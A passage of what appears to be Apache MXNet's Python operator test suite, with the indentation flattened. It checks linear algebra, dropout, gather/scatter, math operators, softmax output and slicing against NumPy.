a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: test fails intermittently when cudnn on. temporarily disabled cudnn until gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
